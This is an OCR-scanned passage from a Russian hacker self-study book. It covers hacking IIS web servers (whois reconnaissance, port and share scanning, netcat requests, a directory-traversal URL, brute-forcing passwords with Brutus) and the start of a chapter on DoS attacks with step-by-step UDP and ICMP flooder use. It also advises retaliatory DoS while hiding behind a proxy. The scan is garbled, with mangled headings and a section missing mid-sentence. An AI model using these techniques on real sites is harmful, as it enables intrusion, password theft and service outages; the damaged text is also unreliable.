Программное обеспечение, применяемое на Web-сайтах, в частности, Web-серверы,
содержит большое число уязвимостей, и выявивший их хакер может с их помощью взломать доступ к сайту. Далее хакер превратит сервер HTTP, обслуживающий сайт, в ворота для проникновения из Интернета в локальную сеть организации, содержащую лакомые информационные ресурсы. Успеху такой атаки
весьма способствует плохая настройка системы защиты Web-сервера, наличие
открытых для записи каталогов, слабые пароли доступа и так далее.
Наконец, отчаявшись взломать Web-сайт, хакер может выполнить атаку DoS и
попросту «завалить» работу компьютерной системы сайта, что неоднократно
происходило даже с такими мощными системами, как сайт Yahoo. Такие атаки
мы опишем в следующей главе, а в этой главе займемся более созидательными и
полезными задачами хакинга Web-серверов, нежели такое достаточно бессмысленное занятие, как отправка (за свой счет) на Web-сервер пакетов, затрудняющих
работу серверного компьютера. Вначале сделаем экскурс в вопросы функционирования сайта Web и выявим задачи, которые должен решить хакер для его взлома.

Функционирование Web~cauma
Функционирование сети Web можно представить себе как обмен информацией
между пользователем Web или, как говорят, клиентом Web, и ресурсом Web,

Самоучитель хакера
причем на пути этого обмена находится многоуровневая
аппаратная система, которая выполняет следующие функции.

программно-

На компьютерах пользователей Web работают программы-клиенты Web, которые обеспечивают пользовательский интерфейс и обмен информацией с сервером Web через сеть Интернет. Сервер Web — это служба, исполняемая на сетевом компьютере и обеспечивающая прием запросов пользователя с последующей передачей запроса приложениям Web, которые обрабатывают запрос и передают ответ серверу Web для пересылки запрошенной информации пользователю. Приложения Web для обработки запросов чаще всего обращаются к базам
данных, используя для этого специальные механизмы подключения к базам данных и поиска в них нужной информации.
В качестве клиентов Web чаще всего используются программы-браузеры Web,
например, Internet Explorer (ffi), работающие на основе двух средств — языка
HTML разработки Web-страниц, и протокола HTTP, регламентирующего обмен
информацией между сервером и клиентом Web.
В качестве серверов Web используется множество программных средств от различных производителей, включая информационный сервер Интернета IIS от фирмы Microsoft, сервер Apache HTTP Server от фирмы Apache Software Foundation и
другие. Эти серверы передают запросы приложениям Web, созданным на основе
технологии ASP (Active Server Page — активные страницы сервера) протокола CGI,
регламентирующего вызовы сценариев сервера, сервлетов Java фирмы SUN, языка
РНР фирмы Apache Software Foundation и многих других.
Приложения Web, получив запрос от сервера Web, чаще всего обращаются к
базам данных, чтобы извлечь нужную информацию. В качестве этих баз данных используются базы SQL фирмы Microsoft, Oracle фирмы Oracle и так далее.
А чтобы подсоединиться к базам данных, передать им запрос и обменяться информацией, в общем, выполнить функции управления базами данных — чаще
всего используются протоколы ODBC (Open Data Base Connectivity — Открытый
интерфейс доступа к базам данных).
И вот перед хакером встает задача — взломать всю эту махину программ, протоколов, сценариев, языков, баз данных, операционных систем… Что же он должен для этого сделать?

Этапы хзк1штз Web~cauma
Исходя из такой многоуровневой структуры средств, обеспечивающих работу с
ресурсами Web-сайта, хакеру приходится потрудиться для прорыва к нужному
ему информационному ресурсу. Как правило, от хакера потребуется выполнение
следующих задач.

116

Хакинг Web-сайтов
• Исследовать структуру Web-сайта — определить, какие компоненты входят в
средства, обеспечивающие работу сайта, в том числе какие клиенты, протоколы, серверы и приложения Web используются сайтом.
• Взломать Web-сервер — поскольку Web-сервер всегда подключен к Интернету,
как правило, через TCP-порт 80, а программы, реализующие Web-серверы,
изобилуют уязвимостями (про которые регулярно оповещают всех желающих базы данных CVE, и даже ленты новостей многих Web-сайтов), то удаленный взлом Web-серверов — это отнюдь не фантастика.
• Исследовать приложение Web — какие механизмы задействованы для обработки запросов — ASP, скриптлеты Java, CGI и так далее — без этого ничего
сделать не удастся, сами понимаете.
• Взломать систему защиты приложения Web — это означает, во-первых, взлом
механизма аутентификации, а во-вторых, механизма авторизации пользователя (и обойти систему аудита!). Задача аутентификации состоит в подборе
пароля, скажем, методом словарной атаки или методом грубой силы — простым перебором всех вариантов пароля. Задача авторизации решается многими путями, например, подменой файла куки (cookie), идентифицирующего
пользователя, если для авторизации использован механизм файлов куки.
• Выполнить атаку вводом данных — хакер должен попытаться взломать защиту приложения путем передачи Web-приложению специально подобранных
данных, воспользовавшись уязвимостями приложения, вызванными ошибками программирования. Наличие таких уязвимостей позволит, например, передать CGI-сценарию исполняемый код вместо числового параметра, — и если
этот CGI-сценарий не проверяет входные параметры, то, исполнив переданный хакерский код, сервер открывает к себе доступ.
• Исследовать интерфейс с базой данных — именно базы данных хранят нужную хакеру информацию, так что хакер должен изучить способ подключения
Web-приложения к базе данных, чтобы попытаться им воспользоваться.
• Взломать защиту интерфейса управления сайтом — как правило, Web-сайты
снабжены средствами удаленного управления, так что ,у них всегда имеется
открытый порт для удаленного управления, и его поиск и взлом — весьма
эффективный метод хакинга.
• Взломать сайт с помощью клиента — например, подменив серверный сценарий, можно собирать информацию обо всех посетителях сайта, а если этот
сценарий внедрить в содержимое Web-странички, можно выполнять успешный хакинг Web-клиентов, который мы обсуждали в предыдущей главе.
Ясно, что описание всех этих средств заняло бы целую книгу (например, см. [И]).
Мы, однако, ограничимся только некоторыми, наиболее популярными методами взлома сайтов, реализованных с помощью сервера IIS 5. Мы опишем, как
117

Самоучитель хакера
можно получить доступ к файловой системе серверного компьютера (раздел
«Хакинг HTTP»), найти уязвимые CGI-сценарии сервера (раздел «Уязвимые
сценарии») и получить доступ к запароленной страничке Web взломом пароля
доступа методом грубой силы (раздел «Взлом доступа к страничкам Web»).
В конце главы мы опишем методы загрузки на жесткий диск компьютера целого
Web-сайта и объясним, что из этого можно извлечь для пользы дела.
Сервер IIS избран по той причине, что это наиболее популярный Web-сервер,
ставший поэтому излюбленной мишенью для хакеров. Антихакер должен отчетливо понимать, что взлом Web-сайта представляет собой значительную угрозу,
поскольку взломанный сервер — это ворота в сеть организации, и проникнувшему в серверный компьютер хакеру открываются большие возможности. Хакер
сможет изменять содержимое сайта — а это прямая угроза фальсификации и дискредитации всей организации, которой принадлежит взломанный Web-сайт. Хакер сможет перехватывать почту — а это угроза конфиденциальности информации или ее фальсификации. Далее, подменяя загружаемые по FTP-доступу файлы, хакер сможет распространять вирусы, трояны и прочие хакерские утилиты.
Так что методы хакинга сайтов должны быть досконально известны антихакеру более того, именно с их учетом следует выполнять тестирование системы защиты сайта на предмет ее устойчивости к атакам.
Рассмотрим перечисленные выше задачи хакинга Web-сайтов по порядку.

Исследование Web~cauma
Никакой серьезный взломщик компьютерной информационной системы, в том
числе Web-сайта, не приступит к атаке без тщательного изучения применяемых
в системе компьютерных технологий. Взломщика будет интересовать архитектура сети, используемые операционные системы, общие ресурсы сети, учетные
записи пользователей этих ресурсов, типы сетевых серверов. Для получения такого рода сведений хакеры, как правило, выполняют следующие действия.
• Предварительный сбор данных, заключающийся в систематизированном сборе открытых сведений о Web-сайте конкретной организации, включая диапазон ГР-адресов сети, подсоединенной к Интернету, сведения о DNS-серверах,
зарегистрированных доменных именах и администраторах сети.
• Сканирование сети организации с целью выявления сервера Web.
• Инвентаризацию открытых портов, запущенных служб и типа операционной
системы серверного компьютера.

118

Хакинг Web-сайтов

Предварительный c£bp данных
Во время предварительного сбора данных о намеченном для атаки Web-сайте
хакер может и должен обратиться к ресурсам Интернета. Эти ресурсы включают
следующее.
• Во-первых, хакер может обратиться к сведениям, хранимым в базах данных
организаций — поставщиков услуг Интернета, обязанных регистрировать
подключаемые к Интернету серверы и сети. Эти данные содержат выделяемые IP-адреса, фамилии, телефоны и адреса администраторов сети, доменные
имена и прочую весьма полезную информацию. В разделе «Базы данных
Whols» мы укажем источники этих сведений.
• Во-вторых, следует самым внимательным образом изучить HTML-код страниц Web-сайта атакуемой организации. Код HTML может содержать комментарии, не отображаемые браузерами Web, но содержащие весьма интересные сведения, вносимые разработчиками страниц для справочных целей.
К примеру, в комментариях могут содержаться контактные телефоны, структура каталогов сервера, адреса электронной почты разработчика, коды сценариев JavaScript и многое другое. Все это весьма ценные сведения для выполнения атаки, и методы извлечения HTML-кода сайта Web описаны в разделе
«Web-спайдер Teleport Pro».
Начать, конечно, следует с регистрационной базы данных Whols — там содержатся первичные, самые важные сведения о локальной сети, поддерживающей
подсоединенный к Интернету сервер Web. Для извлечения этих данных можно
прибегнуть к утилите командной строки whois (традиционного средства системы
Unix), но легче и проще обратиться к Web-сайтам организаций, предоставляющих бесплатный сервис whois прямо со своих Web-страничек.

£азы данных Whols
Вначале обсудим первую возможность. Каждая компания, желающая получить собственное доменное имя в Интернете, обязана зарегистрировать свою локальную
сеть в специальной уполномоченной организации. До 1999 года такое право имела
единственная организация — Network Solution (http://www.networksolution.com),
но теперь услуги по регистрации сетей предоставляет множество других организаций, например, InterNic (http://www.internic.net). Сайты этих организаций содержат открытые базы данных со сведениями о зарегистрированных организациях и/или ссылки на другие сайты с подобной информацией.
Пользуясь сервисами таких Web-сайтов, которые часто называются серверами
Whois (серверы «Кто есть Кто»), можно получить весьма подробные сведения об
информационной системе организации. Хакер может запросить у сервера Whois
все доменные имена Интернета, зарегистрированные организацией, телефон и

119

Самоучитель хакера
адрес электронной почты администратора домена, имена и адреса серверов DNS
сети. В лучшей Европейской базе данных такого рода, принадлежащей центру
RIPE NCC (Network Coordinate Center — Центр сетевых координат), содержатся
сведения о диапазоне IP-адресов зарегистрированных сетей вместе с личными
данными их администраторов. Все эти данные можно запросить с помощью весьма удобного интерфейса Web-страницы центра RIPE NCC (http://www.ripe.net),
представленной на Рис. 8.1.
t @ T 1
Aqp9c|fehltp://www.ripB.net/npen^^ub^^c^^

El ^Пароход |

Рис. 8.1. Web-страничка центра RIPE NCC
для поиска сведений об организации по IP-адресу ее Web-сайта
Что же будет делать взломщик со всей этой информацией? Получив предварительные сведения о локальной сети организации — ГР-адрееа подключенных к
Интернету узлов сети и серверов DNS сетевых доменов — он продолжит изучение сети путем сканирования и инвентаризации сервера.

Сканирование и инвентаризация сервера
Для выполнения этой задачи существует множество утилит, одной из лучших
считается утилита SuperScan (http://www.foundstone.com), диалог которой
приведен на Рис. 8.2.
Чтобы воспользоваться утилитой SuperScan, выполните такие шаги.
> В поле Start (Старт) введите начальный ГР-адрес сканируемой сети.
> В поле Stop (Стоп) введите конечный адрес сканируемой сети.
>• В группе элементов управления Scan type (Тип сканирования) установите
переключатель All list ports from (Все перечисленные порты в диапазоне).
> Щелкните на кнопке Start (Пуск).

120

Хакинг Web-сайтов

Timeout
StarlfTMT
Stop|l.0.0.5

0 Ignore IP zero
0 Ignore IP 255
П Extract from He

P’ng
|400

|

П Resolve hoslnames
121 Only scan responsive pings
[3 Show host responses

Conned

О Ping only

|2000 |

О Every port in lisl

5ИЯИИИ EZB
Ш

О All selected ports in list
Read
14000 I

(5 All list poets from
О All ports from

Рис. 8.2. Сканирование сети выявляет все открытые порты
и запущенные службы
В поле внизу диалога SuperScan отобразятся результаты сканирования. Как видим, на компьютере с IP-адресом 1.0.0.1 открыт порт протокола HTTP и запущен сервер IIS 5.0, так что мы получили нужный результат — наличие в сети сервера Web. И хотя мы экспериментируем в нашей локальной интрасети (чтобы
никого не обидеть), процедура получения этих сведений в Интернете выполняется
подобным образом.

6 shares found on 1 remote hosts.

wa-

M.0.0.1SMy Documents
M.O.(mNETLOGON
M.0.0.1\D
M.0.0.1\Tesl
М.СЩПМу Downloads
M.0.0.1\SYSVOL

1.0.0,1
My Documents
NETLOGON
D
Tesl
My Downloads
SYSVOL

Map Drive

Рис. 8.З. Инвентаризация ресурсов найденного сервера IIS 5
121

Самоучитель хакера
Инвентаризацию общих ресурсов найденного сервера можно выполнить с помощью чрезвычайно популярной программы Legion (http://packetstormsecurity.org/
groups/rhinoS), результат применения которой к найденному хосту
с ГР-адресом 1.0.0.1 представлен на Рис. 8.3.
Теперь, зная о наличии по данному ГР-адресу сервера IIS 5, нас сразу же начинает
интересовать вопрос — можно ли взломать доступ к этому серверу, и каким образом? Обсудим эту тему поподробнее.

се|рвера II5
Хакинг сервера IIS базируется на уязвимостях программных средств сервера,
основанных на протоколах HTTP (Hypertext Transfer Protocol — Протокол передачи гипертекста) и CGI (Common Gateway Interface — Общий шлюзовой интерфейс), а также на уязвимых сценариях сервера IIS, открывающих доступ к ресурсам серверного компьютера.
Протокол HTTP описан, например, в [12], и его функция — обеспечение взаимодействия сервера и клиента Web при запросе и получении текстовой информации. Для этого протокол HTTP предоставляет несколько методов,
основным из которых является метод GET. Когда Web-браузер запрашивает у
сервера информационный ресурс (скажем, текстовый файл), он использует
метод
GET,
одновременно
указывая
адрес
ресурса,
например,
http://www.anyserver.com/documents/order.html. Этот адрес указывает на файл
order.html в каталоге /documents сервера IIS, которому соответствует каталог
локальной файловой системы c:\inetpub\wwwroot\documents.
Протокол CGI описан, например, в [12], и он регламентирует удаленные вызовы
серверных сценариев со стороны клиентов. Вызовы сценариев выполняются с
помощью запросов протокола HTTP, которые имеют такой вид:
http://www.anysite.com/scripts/MyScript?napaMeTp1+napaMeTp2
Здесь MyScript — это название сценария, хранящегося в папке /scripts сервера IIS, a
запись ?Параметр1+Параметр2 определяет фактические параметры, передаваемые
серверному сценарию MyScript. Сервер IIS определяет, что поступивший запрос
предназначен для обработки сценарием, после чего запускает программу сценария,
передает ей параметры и выполняет передачу результатов запроса клиенту.
Кроме протокола CGI, для работы со сценариями используются технологии ASP
(Active Server Pages — Активные страницы сервера) и ISAPI (Internet Server
Programming Interface — Программный интерфейс сервера Интернет). В технологии ASP вызов сценариев выполняется такой строкой запроса:
http://www.anysite.com/scripts/MyScripts7napaMeTp1 =Значение1&Параметр2=
Значение2

122

Хакинг Web-сайтов
В результате исполняется сценарий MyScript.asp, который, как правило, генерирует новую страницу HTML. Интерфейс ISAPI предоставляет возможность
удаленного вызова функций, хранимых в библиотеках ISAPI. Вызов этих функций выполняется по такому запросу HTTP:
http://www.anysite.com/isapi.с111?Переменная1&Переменная2
Теперь, узнав некоторые сведения о работе сервера IIS, посмотрим, чем они могут помочь работе хакера.

ХакиигИГГГ
Протокол HTTP позволяет хакерам достичь много, поскольку его поддержка
сервером IIS не отличается надежной защитой от попыток несанкционированного доступа. В ранних версиях IIS 2.0 достаточно было ввести такой адрес:

http://www.anysite.eom/.7.7.7.7.7winnt/secret.file
чтобы загрузить с Web-сервера информацию, содержащуюся в файле secret.txt.
Это — пример ошибки в реализации системы защиты Windows, хранящей разрешения на доступ к информационным ресурсам в списках ACL. В более новых
версиях IIS эта ошибка исправлена, но ее можно найти у Web-серверов других
производителей [3]. А взамен описанной уязвимости в последних версиях IIS
имеются другие, и их список непрерывно пополняется, что можно видеть по сообщениям на сайтах, посвященных информационной безопасности, например,
SecurityLab.ru (http://www.securitylab.ru).
Чтобы исследовать такого рода уязвимости IIS, очень удобно использовать
утилиту netcat (http://www.atstake.com), (netcat — это очень мощный инструмент — недаром авторы [3] называют netcat основным орудием хакинга IIS).
Проиллюстрируем использование netcat для атаки на сервер Sword-2000 нашей
экспериментальной сети, к услугам которой мы прибегаем на протяжении всей
книги. Для использования netcat в наших целях выполните такую процедуру.
>• Запустите из командной строки компьютера Alex-З утилиту netcat, выполнив
команду nc -vv 1.0.0.1 80.
v После появления сообщения об открытии соединения с сервером введите
строку GET / HTTP/ 1.0 и два раза нажмите клавишу 1Еп1ег1. Результат представлен на Рис. 8.4.
Запрос GET / HTTP/1.0 по умолчанию запрашивает файл из корневого каталога
сервера IIS. Как видно из Рис. 8.4, в ответ получен файл с кодом HTML, загрузка
которого в браузер воспроизведет сообщение об ошибке.

123

Самоучитель хакера
ic-MCommand Piompl
c:\test\netcat>nc -vv 1.0.0.1 80

fud/reu nisnatch: SUORD-20UO !=
| DNS
SUORD-2000 tl.0.0.1] 80 open
GET

/

HTTP

suord-2000.suoi-d.net

/1.0

HTTP/1.1 400 Bad Request

Seruer: M i c r o s o f t — I I S / S . 0
Date: Fri, 28 Feb 2003 12:55:40 GHI
Content-Type: t e x t / h t n l
Content-Length: 87
itml>ErrorThe parameter
sent 17, rcud 224: NOISOCK
C:\test4netcat>

Puc. 8.4. Запрос GET к серверу IIS из утилиты netcat
Чтобы облегчить себе жизнь, можно передавать запросы GET другим способом конвейеризовав ввод данных в командной строке с помощью атрибута • Щелкните на кнопке Start (Старт) в диалоге Brutus — АЕ2 (Рис. 8.20) и наблюдайте за сообщениями и линейным индикатором внизу диалога. Результат представлен в диалоге Brutus — АЕ2 на Рис. 8.22.

140

Хакинг Web-сайтов
^^^^11 X Brutus — AET2 — www.hoobie.net/brulu: — (January 2000)
File

Tool»

Target |1. 0.0.1
.
I
1

Port 1 30

Method

I

(HEAD

PI

Type I HTTP (Basic Auth] |-| | Start

10 Timeout

Connections В^рШ

0 Use Username
U sell D

НШЗОШ

Help

10

Stop | Clear

П Use Proxy [ Define |

0 KeepAlive

Pass Mode [Brute Force pj | Range 1 1 OfeWbutw) |

0 Single Usei

[Administrator

|Biw«*|

Рак

Fife

lwrdi.txt

||Вг«к«|

Positive Authentication Results
Target
1.0.0.1/

1 Type
1 Username
HTTP (Basic Auth)
Administrator

1 Password
007

1

Positive authentication at 1 .0.0.1/ with User : Administrator Password : 007 (992 attempts)
Disengaged target 1.0.0.1 elapsed time : 0:00:17 attempts : 992

тшшштшншш ^* **• **«« ^ ^.™

992

||U:Adrniriistrator P:000

||58 Attempts per second

||ldle

/f

Puc. 8.22. Пароль доступа к IIS взломан!
Теперь, когда при обращении к взломанному серверу IIS отобразится диалог запроса пароля, представленный на Рис. 8.23, вы будете знать, что туда следует
вводить.

Puc. 8.23. Введите в поля диалога найденные логин и пароль и отобразится защищенная страничка Web
Кроме описанной возможности взлома базовой системы аутентификации, программа Brutus позволяет взламывать парольную защиту, реализованную с помощью форм на страничках Web. Такая система защиты функционирует на основе запросов CGI-сценариев Web-сайта. Выбрав в поле Туре (Тип) пункт HTTP
(Form) (HTTP (Форма)) и настроив передачу запросов GET сценариям, можно

141

Самоучитель хакера
подобрать пароль доступа к ресурсу, воспользовавшись теми же методами, что и
описанный выше способ взлома грубой силой, или выполнить словарную атаку.

Заключение
Сайты Web, поддерживаемые на подключенных к Интернету серверах корпоративной сети, — это наилучшие объекты для удаленного взлома доступа к информационным ресурсам организации. Для хакинга сайтов Web создано множество
утилит, часть из которых описана в этой главе. Следует однако учесть, что задача хакинга такой системы вовсе не так проста, как это может показаться на первый взгляд. Если раньше, в доисторическую эпоху систем Windows NT/95/98,
достаточно было отсканировать Web-сайт программами типа CGI Vulnerability
Scan или D@MNED CGI Scanner 2.1, найти несколько уязвимых сценариев, а
потом с помощью эксплойтов, в изобилии представленных на хакерских Webсайтах, без всяких проблем взломать доступ к ламерскому серверу, то нынче все
это усложнилось.
Чтобы взломать настоящий, защищенный Web-сайт, приходится долго подыскивать ключики к его уязвимостям, причем еще не факт, что удастся найти надежные эксплойты для проникновения в сервер через найденную дыру в системе
защиты. Так что наилучший способ хакинга сайтов Web — это внимательное отслеживание новейших уязвимостей и самодельное изготовление эксплойтов,
чаще всего представленных на Web-сайтах в виде исходных текстов программ.
Антихакер же должен помнить, что ныне имеется множество мощных программных средств исследования безопасности Web-сайтов — например, приложение Retina, описание которого можно найти, например, в [7]. Другая возможность создания надежной защиты Web-сайта — это испытание его на прочность
с помощью хакерских утилит, а для этого антихакер должен в совершенстве овладеть методикой их использования.

142

Г Л А В А 9.

UoS
Сразу после появления и массового распространения сетей, построенных на основе стека протоколов TCP/IP, хакеры занялись разработкой средств для выполнения в сетях TCP/IP действий, которые можно назвать настоящим кибертерроризмом. Эти действия, при всем их разнообразии, сводятся к одному — атакам,
направленным на разрушение или нарушение нормального функционирования
различных сетевых сервисов и называемых атаками DoS (Denial of Service Отказ в обслуживании). Технически атаки DoS реализуются с помощью программ-эксплойтов, использующих уязвимости стека протоколов TCP/IP и сетевого программного обеспечения.
Атаки DoS представляют собой сущее бедствие для современных сетевых компьютерных систем, в особенности для Интернета. Ежегодно атаки DoS опустошают ресурсы различных сайтов Интернета, среди которых присутствуют такие
известные сайты, как Yahoo, eBay, CNN.com, www.Microsoft.com, приводя к
финансовым потерям их хозяев, исчисляемых миллионами долларов [3].
Как правило, следствием таких атак является выход из строя серверов Интернета
из-за перегрузки, что приводит к недоступности услуг этих сайтов и, следовательно, к потере возможных доходов.
Причины применения атак DoS могут быть самыми различными, начиная от
простого хулиганства и кончая самым настоящим кибертерроризмом, имеющим
своей целью достижение, в том числе, определенных политических целей.
Тем не менее, как справедливо указано в [3], для настоящего хакера атаки DoS
не представляют особого интереса, вследствие их очевидной никчемности с точки зрения доступа к информации. Мы, однако, не будем обсуждать цели, преследуемые «кул хацкерами», выполняющими атаку DoS против первого попавшегося им под руку Web-сайта; заметим только, что для антихакера атаки DoS
иногда становятся единственным средством защиты от нападений из сети. В самом деле, когда сразу с нескольких компьютеров на вас направляется целый
шквал сетевых пакетов, защититься от него можно только одним способом — послав в ответ «залп» из сетевого «орудия», представляющего собой аналог хакерского инструмента для атаки DoS.
В данном случае уместно напомнить, что деяния типа атаки
DoS никак не могут понравиться ее жертвам, что может иметь
для хакера самые печальные последствия. Так что даже применяя атаку DoS против надоедливых киберхулиганов, помните,
что нелишне предпринять те же меры защиты, что используют
хакеры, — работайте через прокси-сервер и под защитой брандмауэра или системы IDS (например, BlacklCE Defender
(http://blackice.iss.net/)), чтобы избежать раскрытия конфиденциальности и возможной реакции объектов атаки.

Самоучитель хакера
В этой главе мы вначале рассмотрим общую классификацию атак DoS, а потом
рассмотрим разновидности этих атак вместе с некоторыми программами, вошедшими в классический набор инструментов хакинга.

Разновидности атак’РоЗ
Целью атаки DoS является приведение компьютерной системы в состояние,
когда ее функционирование становится невозможным. Технически реализация
такой задачи может быть выполнена различными методами, поэтому чтобы было легче ориентироваться, мы разобьем атаки DoS на такие категории.
• Атаки насыщением полосы пропускания — отсылая на атакуемый хост большое число пакетов, хакер перенасыщает полосу пропускания определенной
сети, скажем, Интернета (так был неоднократно атакован Web-сайт Yahoo).
Такую атаку хакер может выполнить двояким образом. Если хакер использует сетевое подключение с большой полосой пропускания, скажем, Т1 (ширина 1544 Мбит/с), то ему ничего не стоит затопить пакетами сетевое соединение с полосой пропускания, скажем, 56 Кбит/с (модемное подключение).
Другой вариант — использование усиливающей сети, когда хакер использует
не слишком быстрый канал связи, например, модемное соединение. В этом
случае с помощью определенной технологии хакер посылает поток пакетов
на атакуемый хост сразу со всех компьютеров усиливающей сети.
• Атаки на истощение ресурсов — отсылая на атакуемый хост специально подготовленные пакеты, хакер вынуждает атакуемый компьютер тратить свои
ресурсы на обработку этих пакетов. Происходит захват системных ресурсов
атакуемого компьютера — центрального процессора, памяти и других, после
чего хост выходит из строя.
• Атаки некорректными сетевыми пакетами — отсылая на атакуемый хост особым образом искаженные пакеты, хакер нарушает работу сетевого программного обеспечения или операционной системы компьютера. В таких атаках
используются уязвимости, связанные с ошибками в коде программных
средств.
• Атаки фальсифицированными сетевыми пакетами — искажая сетевые пакеты,
хакер принуждает хост изменить конфигурацию или состояние атакуемой
компьютерной системы, что снижает ее производительность или даже приводит к некорректной работе хостов. Такие атаки основываются на уязвимостях
или плохой настройке системы защиты.
Опишем подробнее атаки DoS перечисленных разновидностей, проиллюстрировав их примерами атак, ставших «классикой» этой разновидности хакинга.

144

Атаки DoS

Агтаки насыщением полосы пропускания
Чтобы переполнить полосу пропускания линии связи атакуемого хоста, хакер
должен принять во внимание возможности своего собственного сетевого соединения. Если хакерский компьютер напрямую подключен к Интернету через соединение Т1, то ему вполне по силам в одиночку «завалить» любой Web-сайт [3], не говоря уже о клиентах, работающих через модемные подключения. Выполнив лавинообразное генерирование пакетов, хакер заполняет ими линию связи атакуемого
хоста, после чего работа

атакованного хоста в сети становится невозможной.
Для выполнения такой атаки существует множество инструментов, использующих различные сетевые протоколы. Рассмотрим работу двух, весьма популярных программ — флудеры UDP и ICMP.
Все примеры атак DoS, рассмотренные в этой главе, будут иллюстрироваться на экспериментальной локальной сети, которую мы использовали в предыдущих главах для описания атак на
службы электронной почты и /СО. Автор категорически отвергает всякую возможность использования этой информации для
выполнения реальных атак со своего компьютера и предупреждает о возможной ответственности.

Как явствует из названия, флудер UDP должен «затоплять» атакуемого клиента
пакетами UDP, нарушая работу компьютера. Весьма удобной программой, реализующей такую атаку DoS, можно назвать утилиту UDP Flooder 2.0 компании
Foundstone (http://www.foundstone.com), которая, вообще-то говоря, была создана для проверки устойчивости хостов к атакам такого рода.
На Рис. 9.1 представлен диалог программы UDP Flooder 2.O.
Чтобы проиллюстрировать работу утилиты UDP Flooder 2.0, мы воспользуемся
нашей экспериментальной сетью и выполним атаку DoS на компьютер А1ех-3
с IP-адресом 1.0.0.5 с помощью такой последовательности действий.
> Запустите утилиту UDP Flooder 2.O.
у В поле IP/hostname (IP/имя хоста) введите IP-адрес или имя NetBIOS атакуемого компьютера — в данном случае введен IP-адрес 1.0.0.5.
> В поле Port (Порт) введите номер порта, в данном случае введен порт 80, поскольку его используют HTTP-серверы.

145

Самоучитель хакера
UDP Flondfir 2 ПО

ВВЕЗ1

IP: 1.0.0.1

^ __. 11011
.

IP/hostname |1. 0.0.5

|
Т

Max duration (sees)

Port [30

|

II

^Infinite] |

Max packets [[Infinite]

min

|

max

Speed (pkts/sec)

[-[

| 250 |

.

~»V

Modem — >— Cable — >— Tl — >— LAN

© Random
О Text

[20000 | to [30000 | bytes

|

|»—’ UDFFlocH! Server eH’iste

О From file | Brows» 1 1

|
| Go

Packets sent

903

Seconds elapsed

20.299

|

Stop

Puc. 9.1. Подготовка атаки заливкой пакетов UDP
не займет у вас много времени
Установите ползунок Speed (Скорость) в позицию LAN, поскольку мы исполняем атаку через локальную сеть.
В группе элементов управления Data (Данные) установите переключатель
Random (Случайная генерация),
• Windows Task Manager
что вынудит флудер генериро- £File
Opliont View Help
вать и отсылать на атакуемый
Applications | Processes J Performance | Nettvi^ing [
компьютер случайные данные.
•Sword •
> В ставшие доступными поля
справа от переключателя введите значения, соответственно,
20 000 и 30 000, установив длину передаваемых пакетов.
> Щелкните на кнопке Go (Атаковать).
>• Когда вы сочтете, что с вашей
жертвы достаточно, щелкните на
кнопке Stop (Стоп).
На Рис. 9.2 представлен результат
воздействия атаки на компьютер
Alex-З в виде диалога диспетчера
задач, открытого на вкладке Networking (Сеть).
146

Adapter Name

[[Processes: 39

I Network Utilization I

||CPU Usage: 22%

Link Speed I
10 Mbps

Operatic

[[Commit Charge: 150620K / 47864 J

Puc. 9.2. Атака удалась — сетевое
соединение заполнено пакетами на 80%

Атаки DoS
Как видим, результат неплох — сетевое подключение занято в основном приемом
пакетов UDP, реакция компьютера замедлена и мощности процессора на 50%
заняты обработкой поступающей бессмысленной информации. И все это достигнуто при использовании равноценных подключений — и хакер, и его жертва
подсоединены к LAN типа Ethernet I DBase.

4>лус)ер ICMP
Флудеры (или бомберы) ICMP (Internet Control Message Protocol — Протокол
управляющих сообщений Интернета) очень похож на только что рассмотренный
флудер UDP. На Рис. 9.3 представлен диалог одного из флудеров X-Script ICMP
Bomber.
pt ICMP Bomber vO 3 By Code
Host |1.0.0.5
Packet Size: h ooOOO

\ NumberToSenchhooo

Received 34464 bytes from 1.0.0.5 in 60 msecs
Received 34464 bytes from 1.0.0.5 in 60 msecs
Received 34464 bytes from 1.0.0.5 in 60 msecs
Received 34464 bytes from 1.0.0.5 in 60 msecs
Received 34464 bytes from 1.0.0.5 in 60 msecs

Рис. 9.З. Флудер X-Script ICMP Bomber весьма прост, но эффективен
Чтобы «зафлудить» неприятельский компьютер, хакеру достаточно в поле Host
(Хост) указать IP-адрес или имя компьютера жертвы, после чего щелкнуть на
кнопке Ping (Пинг). При необходимости, в поле Packet Size (Размер пакета)
можно задать размер пакетов, а в поле Number to Send (Количество пакетов) число отсылаемых пакетов. Размер пакета весьма влияет на эффект применения
флудера — большой размер пакета приводит к практически полному затоплению
сетевого соединения жертвы. На Рис. 9.4 представлен диалог диспетчера задач,
показывающий загрузку сетевого соединения компьютера Alex-З (его IP-адрес
равен, как вы помните, 1.0.0.5).
Атака ICMP особенно эффективна еще и тем, что протокол ICMP (Internet Control Message Protocol — Протокол управляющих сообщений Интернета) предназначен для тестирования работы сети TCP/IP, и пакеты ICMP имеют высокий
приоритет обслуживания. Так что флудеры ICMP могут быть весьма полезным
инструментом разборки со всякого рода персонажами, не дающим прохода
Web-путешественникам; к тому же флудеры ICMP не требуют никаких особенных знаний для их использования.

147

Самоучитель хакера

ааа

Г» Windows Task Managei
File

Options

View

Help

Applications I Processes I Performance I Networking

Processes: 38

||CPU Usage: 5%

\\Commb Charge: 1417Ж / 47864 ^

Puc. 9.4. Атака DoS вполне удачна!

Aht3K3 Smurf
Но что делать, если намечаемая жертва подключена к сети через быстрое соединение, а хакер не имеет доступа к достаточно мощному подключению, которое
позволит ему выполнить атаку DoS достаточно эффективно? Тогда хакеру следует прибегнуть к более сложной атаке Smurf, которая заключается в следующем.
Вместо того, чтобы отсылать пакеты с хакерского компьютера, в атаке Smurf
используется усиливающая сеть. С хакерского компьютера на широковещательный адрес усиливающей сети посылаются пакеты ECHO (Эхо) протокола ICMP,
которые обычно используются для диагностики сети. В рассылаемых пакетах хакер подменяет исходный адрес пакетов IP-адресом атакуемого хоста, после чего
все компьютеры усиливающей сети посылают ответные пакеты жертвенному компьютеру. Эффект от такой атаки может быть весьма велик, поскольку если усиливающая сеть состоит из нескольких десятков компьютеров, то один ЕСНО-запрос
размером 10 Кбайт может вызвать лавину ответов общим объемом несколько мегабайт, и сетевое соединение атакуемого компьютера просто захлебнется.
Другой, наиболее опасной атакой описываемой разновидности является распределенная атака DoS, или DDoS (Distributed DoS). Суть атак DDoS состоит в помещении на сетевых компьютерах программ-клиентов, работающих под управлением центральной консоли. В определенный момент времени по команде с
хакерской консоли эти клиенты, имеющие выразительное название «зомби»,

148

Атаки DoS
начинают атаку DoS по указанному адресу Интернета. Среди атак DDoS наиболее популярной является WinTrinoo (сайт разработчика находится по адресу
